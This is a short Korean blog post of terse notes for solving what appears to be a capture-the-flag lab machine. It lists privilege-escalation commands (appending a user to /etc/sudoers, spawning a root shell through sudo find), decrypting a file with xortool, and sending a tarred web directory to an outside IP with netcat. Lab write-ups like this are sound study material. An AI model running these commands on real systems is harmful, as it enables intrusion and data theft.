호그와트

해킹하는 제다이 큐큐

영웅*^%&$ 2023. 4. 25. 14:08
728x90

보면 알다시피 root 권한을 얻는게 엄청 쉽게 되어 있습디야다당

초반에 끝없이 뇌절하는 서버

rm .bashrhc

nano /opt/brilliant_script.sh

#!/bin/sh

echo "alex ALL=(ALL:ALL) ALL" >> /etc/sudoers;

sudo find /etc/passwd -exec /bin/sh \; => root

service ssh start

service cron start

httpd-foreground

-- 단서 ?

cd /lib/x86_64-linux-gnu

sudo mv oldliblogging.so liblogging.so

/root/.ssh/authorized_keys

strings fixutil | grep "fixutil"

/usr/local/apache2/htdocs/

/opt/.fixutil/

/opt/.fixutil/backup.txt --> key

xortool -d reallyimportant.txt myfile.txt

AdsipPewFlfkmll

scp * alex@10.10.204.111:/home/alex/

150c1a1a5024000f324c02040e1901240a074919234505230d0a07144c052c141c1b04310b0368662f4b05031c24441d0604380c19214c0e0a1d1c092f17531d1f700c037d4c2f4b0e0d026610530b153117573204034b19040334031b1d503f03572a03091804020b610d0747

nc -lvp 9007 > backup.tar

cd /usr/local/apache2/htdocs

tar -cvf backup.tar *

nc 10.10.74.101 9007 < backup.tar

요로코롬 푸시면 됩니당 참 쉽죠?

728x90
저작자표시

'호그와트' 카테고리의 다른 글

티키타카의 진수  (0) 2023.05.03
쟤~~쟈자밌는 해킹  (0) 2023.04.27
어허 자네 웹사이트에 얼마나 있는지 좀 볼까?  (0) 2023.03.19
간단하게 요세푸스 순열 구하기  (0) 2023.02.02
캐글에 있는 house 데이터 실습  (0) 2023.02.02

'호그와트'의 다른글

  • 현재글해킹하는 제다이 큐큐

관련글

티스토리툴바